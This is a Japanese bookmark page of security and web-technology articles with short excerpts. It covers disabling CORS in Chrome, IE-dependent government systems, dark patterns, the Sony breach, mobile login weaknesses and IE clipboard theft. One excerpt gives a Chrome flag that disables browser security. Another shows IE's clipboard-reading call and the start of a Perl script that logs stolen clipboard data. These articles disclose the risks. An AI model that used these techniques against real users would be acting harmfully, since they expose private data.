タグ

セキュリティとWeb技術に関するarajinのブックマーク (9)

  • ブラウザでCORSを無効化する方法 - Qiita

    警告 記事に記載している内容はCORSだけでなく、ブラウザの様々なセキュリティ機能を無効化する危険な行為です。 今すぐにセキュリティを無効化しないといけない事情がある場合を除いて安易に実施しないでください。セキュリティを無効化した状態でのインターネット接続など言語道断です。 上記内容、そして記事に記載している行為を理解している方のみ自己責任でお願いします。 Google Chrome 以下のコマンドでChromeを起動する。--user-data-dirを指定しないと既存の設定でChromeが起動し、セキュリティは有効のままだった。 不要になったらここで作成したデータディレクトリは消せばよい。 <Chrome実行ファイル> --disable-web-security --user-data-dir=<データディレクトリ>

    ブラウザでCORSを無効化する方法 - Qiita
  • 何故お役所ってオワコンIEが大好きなの?|楠 正憲(デジタル庁統括官)

    普通は役所のシステムって構築してから5年とか7年は塩漬けにして使うもので、一度やらかしてしまうと名誉挽回の機会なんて向こう数年は与えられないんだけど、こと件に関しては高市総務大臣から「今すぐ私がマニュアルなしでも使えるように直しなさい」と叱責いただいて、しっかりと予算的なサポートも得られたことで、たったの数ヶ月で立て直すことができた。 この数ヶ月は外部のセキュリティやPKIの専門家の方から様々なサポートをいただいて何とか実現したんだけれども、役所のシステム開発としては非常識というか、極めて難易度が高い案件だった。「え?単にChromeやSafariをサポートするだけでしょ、難しい訳ないじゃん」と思う諸兄は、もうしばらくこの話に付き合って欲しい。 もともとマイナポータルは日を代表するITベンダーと通信キャリアの3社が開発したんだけど、大臣からの叱責を受け「ちゃんとお金を払うから直してよ」

    何故お役所ってオワコンIEが大好きなの?|楠 正憲(デジタル庁統括官)
    arajin
    arajin 2020/07/18
    「そもそもブラウザからICカードリーダーという物理デバイスを叩くこと自体がマルウェアと非常に挙動が似ているので、ブラウザのサンドボックスが強化される度に動かなくなるのは技術的には致し方ない」
  • ユーザーをだますのが目的のデザイン「ダークパターン」いろいろ

    by Thomas Guignard インターネットを利用していると、自分の意図しない予想外の操作がなされてしまい戸惑うことがたまにありますが、それはそもそも人をだますことを目的としたデザインかもしれません。そんな人をだますことを目的とするユーザーインターフェースは「ダークパターン」と命名され、その手法がまとめられています。 Dark Patterns - User Interfaces Designed to Trick People http://darkpatterns.org/ ダークパターンとは人をだます目的で作られたユーザーインターフェースであり、決してミスデザインではありません。それらは人間の心理をよく理解して注意深く作られていますが、ユーザーの利益はまったく考えられていません。 ロンドンのデザイナーであるHarry Brignullさんは、ダークパターンについてまとめたサイ

    ユーザーをだますのが目的のデザイン「ダークパターン」いろいろ
  • サービス終了のお知らせ - NAVER まとめ

    サービス終了のお知らせ NAVERまとめは2020年9月30日をもちましてサービス終了いたしました。 約11年間、NAVERまとめをご利用・ご愛顧いただき誠にありがとうございました。

    サービス終了のお知らせ - NAVER まとめ
  • ソニーの迷走をトヨタの忍耐と比較する | ニューズウィーク日本版 オフィシャルサイト

    PS3のネットゲーム会員に関する個人情報流出など、一連のデータセキュリティ防衛の失敗が明るみに出たソニーですが、当初は米議会の公聴会への召喚を拒否したり対応がスッタモンダしていました。その対応には米政界から圧力が高まり、最終的には6月2日に議会下院エネルギー通商委員会小委員会において、ソニーのネットワーク・エンターテインメント(SNE)・インターナショナル社長のティム・シャーフ氏が証言台に立つことになりました。 この議会公聴会ですが、全体として淡々と進行したものの、小委員会のメアリ・ボノ・マック委員長(共和、カリフォルニア44区)は終始厳しい姿勢でしたし、与野党の各議員からは対応の遅さを指摘するなど、追求が続きました。さて、このシャーフSNEインターナショナル社長の対応ですが、一昨年から昨年にかけて発生した北米におけるトヨタの連続リコール事件と比較すると、大きな問題を残したと言わざるを得ま

    arajin
    arajin 2011/06/12
    「IT企業は、サイバー攻撃に負けてはならないのです。自身の技術力が足りなくて、あるいはプロテクションが後手に回ることで侵入を許したら、その時点で「敗北」」
  • このURLは存在しません。

    ■ なぜ一流企業はhttpsでの閲覧をさせないようにするのか 「かんたんログイン」などという似非認証方式は、たとえIPアドレス制限を実装したとしても安全でない。仕様が公開されていないからという点の他に、技術的な理由として、少なくとも次の2つがある。 「IPアドレス帯域」と俗称される重要情報が安全に配布されていない。 SSLを必要とするケータイサイトでは、通信経路上の攻撃によってなりすましログインされてしまう。*1 2番目には解決策がない。 1番目については解決策はあるだろうが、携帯電話事業者がサボタージュしていて、実現される見通しがない。これについては、2008年7月27日の日記にも書いたが、その後どうなったかを調べてみたところ、ソフトバンクモバイル以外は、何ら改善されておらず、当時のままだった。 NTTドコモ 「iモードセンタのIPアドレス帯域」のページをhttps:// でアクセスする

  • 「スパイウェア」が侵入してくるのはどんなときか実験してみる(CA基準)

    ■ 「スパイウェア」が侵入してくるのはどんなときか実験してみる(CA基準) 14日の日記に書いたように、日CAはtracking cookieをスパイウェアと位置付けているわけだが、その「スパイウェア」とやらはいったいどんなときに我々のパソコンに侵入してくるのか、実験してみた。 実験方法は以下の手順。 Internet Explorerをデフォルト設定にする。 「インターネットオプション」の「全般」タブとのころにある、「Cookieの削除」ボタンを押す。 CA無料スパイウェアスキャンで、(CnsMin以外の)スパイウェアが検出されないことを確認する。 どこかのWebサイトを訪れる。 再びCA無料スパイウェアスキャンで、何か検出されるか調べる。 まず、トレンドマイクロ社Webサイトのトップページにジャンプした後、すぐスキャンしてみると、

  • Internet Explorerの「スクリプトによる貼り付け処理」機能の能力を検証する

    2001年11月5日 作成 2001年11月11日 追記: 「関連」の3番目の項目 目次 概要 検証実験 脅威 Microsoftの公式見解 クリップボードの盗聴を防止する設定 関連 FAQ 概要 MicrosoftのWebブラウザ「Internet Explorer」(以下「IE」と略す)には、 「スクリプトによる貼り付け」という名の機能があります。これは、 「JScript」(JavaScriptMicrosoftが独自拡張した言語の名称)の 独自機能のひとつで、 var str = clipboardData.getData("Text"); という一文で、 システムのクリップボードの中身を取り出せる機能です。 これは、おそらく、Web上のサービスでカット&ペースト機能をJScriptで 実現するために用意された機能と考えられます。 しかし、この機能が悪用されると、 悪意のあるペー

  • あなたのクリップボードが盗まれる - Ceekz Logs

    IE には、便利な機能がある。それは、スクリプト(JavaScript etc..)でクリップボードの操作ができるのだ。clipboardData というオブジェクトね。操作できる内容は、クリップボードにデータを読み込むこと(setData)、読み出すこと(getData)、消去すること(clearData)の3種類。 読み出すことも可能なんですよね。しかも、デフォルトでは、警告すら出ない。 以下のような、プログラムを準備しよう。 #!/usr/bin/perl use strict; my $file = '/tmp/cb.txt'; open (CB, ">> $file"); print CB "$ENV{'QUERY_STRING'}\n"; close (CB); print "Status: 301 Moved Permanently\n"; print "Location:

  • 1